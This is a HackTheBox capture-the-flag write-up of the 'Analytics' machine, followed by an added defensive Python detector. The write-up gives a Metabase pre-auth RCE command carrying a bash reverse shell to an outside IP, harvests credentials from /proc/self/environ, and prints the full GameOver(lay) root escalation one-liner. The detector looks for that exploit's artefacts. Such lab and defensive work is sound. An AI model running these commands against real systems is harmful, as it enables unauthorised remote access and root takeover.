
HackTheBox WriteUp - Analytics
- Ts3c
- HackTheBox , WriteUp , Hacking
- January 23, 2024
This time we will have a look at the HackTheBox machine Analytics.
First things first: we start with an nmap scan. It shows two open ports, 22 (SSH) and 80 (HTTP).
Port 80 serves a dashboard with nothing special on it. After clicking around for a while I found the Login button, which redirects to the subdomain http://data.analytics.htb.
On this subdomain I did the usual directory scanning and found an interesting path, /api/session/properties.
With this information I started searching the internet for known exploits and found this very new GitHub repo:
https://github.com/m3m0o/metabase-pre-auth-rce-poc
Next I cloned the exploit and fired it up against the target with:
python main.py -u http://data.analytics.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c '/bin/bash -i >& /dev/tcp/10.10.14.82/1336 0>&1'
and started listening on port 1336 for the reverse shell:
nc -lnvp 1336
Nice! This one worked.
On this machine I looked around for interesting files.
I found some sensitive data in /proc/self/environ, the environment of the running process.
Analysing the file shows some credentials. Let's try them for SSH.
I used ssh to connect to the machine and grabbed user.txt.
Privilege Escalation
Now we need a privilege escalation vector. sudo -l does not work here, so I ran uname -a to check the kernel version of the Linux system.
With that result I looked for known exploits in the wild and found the GameOver(lay) Ubuntu privilege escalation (CVE-2023-2640 / CVE-2023-32629). For this I used this GitHub repo:
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/tree/main
Running this one-liner in the SSH session gave root access:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
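From the defender's side, the one-liner above depends on one setting and leaves two file artefacts: it needs unprivileged user namespaces (unshare -rm), it copies python3 into the user's directory and gives it cap_setuid, and it drops a setuid-root bash into /var/tmp. The overlay mount itself lives in the private mount namespace created by unshare -m, so it never shows up in the host's /proc/mounts; the durable signals are the files and the namespace setting. The following Python is an added example of mine, not code from the writeup or from the linked exploit repository. It parses the output you would get from `sysctl kernel.unprivileged_userns_clone`, `find / -perm -4000 -printf '%p %m %U\n'` and `getcap -r /`; all sample data is constructed, and the list of untrusted directories is an assumption to adjust to your own baseline.

```python
"""Defensive checks for the artefacts of a GameOver(lay) style escalation:
a capability-bearing python3 copy in a user directory, a setuid-root shell
in a temp directory, and unrestricted unprivileged user namespaces.

All sample data below is constructed for illustration; nothing here comes
from the target machine.
"""
import re
import stat

# Assumption: a setuid-root file or a cap_setuid binary in these trees is
# almost never legitimate. Adjust to your environment's baseline.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def userns_unrestricted(sysctl_text: str) -> bool:
    """Return True when unprivileged user namespaces are allowed.

    Parses the output of `sysctl kernel.unprivileged_userns_clone` (the
    Debian/Ubuntu sysctl). `unshare -rm` requires this to be enabled; a
    missing sysctl is treated conservatively as "not restricted".
    """
    m = re.search(r"kernel\.unprivileged_userns_clone\s*=\s*(\d+)", sysctl_text)
    if m is None:
        return True
    return m.group(1) != "0"


def suspicious_setuid(find_lines):
    """Flag setuid files owned by root that live under UNTRUSTED_DIRS.

    Each line has the shape produced by
    `find / -perm -4000 -printf '%p %m %U\\n'`: path, octal mode, uid.
    """
    hits = []
    for line in find_lines:
        line = line.strip()
        if not line:
            continue
        # rsplit keeps paths containing spaces intact
        path, mode, uid = line.rsplit(None, 2)
        if int(mode, 8) & stat.S_ISUID and uid == "0" and path.startswith(UNTRUSTED_DIRS):
            hits.append(path)
    return hits


def suspicious_capabilities(getcap_lines):
    """Flag binaries under UNTRUSTED_DIRS that carry cap_setuid.

    Accepts both getcap output styles: `path cap_setuid=eip` and
    `path = cap_setuid+eip`.
    """
    hits = []
    for line in getcap_lines:
        line = line.strip()
        if not line:
            continue
        path = line.split()[0]
        if "cap_setuid" in line and path.startswith(UNTRUSTED_DIRS):
            hits.append(path)
    return hits


def run_checks(sysctl_text, find_lines, getcap_lines):
    """Combine the three checks into one findings dict."""
    return {
        "userns_unrestricted": userns_unrestricted(sysctl_text),
        "setuid": suspicious_setuid(find_lines),
        "capabilities": suspicious_capabilities(getcap_lines),
    }


# Constructed sample inputs mirroring the artefacts of the one-liner.
SAMPLE_SYSCTL = "kernel.unprivileged_userns_clone = 1\n"
SAMPLE_FIND = """\
/usr/bin/sudo 4755 0
/usr/bin/passwd 4755 0
/var/tmp/bash 4755 0
/home/alice/tool 4755 1000
"""
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/home/alice/l/python3 cap_setuid=eip
"""

if __name__ == "__main__":
    findings = run_checks(SAMPLE_SYSCTL, SAMPLE_FIND.splitlines(), SAMPLE_GETCAP.splitlines())
    for key, value in findings.items():
        print(f"{key}: {value}")
```

On a live host you would feed the functions the real command output instead of the constructed samples; the exploit removes its files at the end, so the file checks catch an active or interrupted attempt, while the sysctl check tells you whether the precondition for unshare -rm is still present at all.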